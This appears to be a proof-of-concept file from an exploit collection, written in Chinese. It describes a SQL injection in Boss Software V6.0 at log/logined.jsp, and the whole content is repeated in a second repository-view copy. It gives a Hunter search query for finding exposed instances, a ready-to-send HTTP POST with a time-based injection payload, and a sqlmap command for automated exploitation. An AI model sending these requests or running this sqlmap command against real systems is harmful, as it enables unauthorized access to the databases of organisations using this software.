POC/wpoc/博斯软件/博斯软件V6.0存在sql注入.md

# 博斯软件V6.0 存在 sql 注入

# 一、漏洞简介
福建博思软件股份有限公司博斯软件V6.0 log/logined.jsp存在SQL注入漏洞。

# 二、影响版本
+ 博斯软件V6.0

# 三、资产测绘
+ hunter`web.title:"欢迎使用 博斯软件"`
+ 特征

![1697813092548-472a2527-ceb8-41ff-874b-32ce4c0e7ebe.png](./img/qesLgT3zkCECCWG7/1697813092548-472a2527-ceb8-41ff-874b-32ce4c0e7ebe-167743.png)

# 四、漏洞复现
```java
POST /log/logined.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONID=80D835813F9733E867790648CBAA0EC6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 106
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: xx.xx.xx.xx
Connection: Keep-alive

Submit=-1A&account=-1password=g-1';WAITFOR DELAY '0:0:5'--
```

![1697813144963-54dfd143-ad16-466e-accc-847ad43268c6.png](./img/qesLgT3zkCECCWG7/1697813144963-54dfd143-ad16-466e-accc-847ad43268c6-568851.png)

sqlmap

```java
POST /log/logined.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONID=80D835813F9733E867790648CBAA0EC6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 106
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: xx.xx.xx.xx
Connection: Keep-alive

Submit=-1A&account=-1password=g-2
```

```java
sqlmap -r 1.txt --batch --level 3 --thread 5
```

![1697813586437-c2b66328-c97f-4130-b663-8b4fe9ae5e07.png](./img/qesLgT3zkCECCWG7/1697813586437-c2b66328-c97f-4130-b663-8b4fe9ae5e07-922009.png)


> 更新: 2024-02-29 23:55:47  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zprm44mso2ysykrg>
first commit 2025-03-04 23:12:57 +08:00			`# 博斯软件V6.0 存在 sql 注入`

			`# 一、漏洞简介`
			`福建博思软件股份有限公司博斯软件V6.0 log/logined.jsp存在SQL注入漏洞。`

			`# 二、影响版本`
			`+ 博斯软件V6.0`

			`# 三、资产测绘`
			+ hunter`web.title:"欢迎使用博斯软件"`
			`+ 特征`

			`![1697813092548-472a2527-ceb8-41ff-874b-32ce4c0e7ebe.png](./img/qesLgT3zkCECCWG7/1697813092548-472a2527-ceb8-41ff-874b-32ce4c0e7ebe-167743.png)`

			`# 四、漏洞复现`
			```java
			`POST /log/logined.jsp HTTP/1.1`
			`Content-Type: application/x-www-form-urlencoded`
			`X-Requested-With: XMLHttpRequest`
			`Cookie: JSESSIONID=80D835813F9733E867790648CBAA0EC6`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8`
			`Accept-Encoding: gzip,deflate`
			`Content-Length: 106`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36`
			`Host: xx.xx.xx.xx`
			`Connection: Keep-alive`

			`Submit=-1A&account=-1password=g-1';WAITFOR DELAY '0:0:5'--`
			```

			`![1697813144963-54dfd143-ad16-466e-accc-847ad43268c6.png](./img/qesLgT3zkCECCWG7/1697813144963-54dfd143-ad16-466e-accc-847ad43268c6-568851.png)`

			`sqlmap`

			```java
			`POST /log/logined.jsp HTTP/1.1`
			`Content-Type: application/x-www-form-urlencoded`
			`X-Requested-With: XMLHttpRequest`
			`Cookie: JSESSIONID=80D835813F9733E867790648CBAA0EC6`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8`
			`Accept-Encoding: gzip,deflate`
			`Content-Length: 106`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36`
			`Host: xx.xx.xx.xx`
			`Connection: Keep-alive`

			`Submit=-1A&account=-1password=g-2`
			```

			```java
			`sqlmap -r 1.txt --batch --level 3 --thread 5`
			```

			`![1697813586437-c2b66328-c97f-4130-b663-8b4fe9ae5e07.png](./img/qesLgT3zkCECCWG7/1697813586437-c2b66328-c97f-4130-b663-8b4fe9ae5e07-922009.png)`



			`> 更新: 2024-02-29 23:55:47`
			`> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zprm44mso2ysykrg>`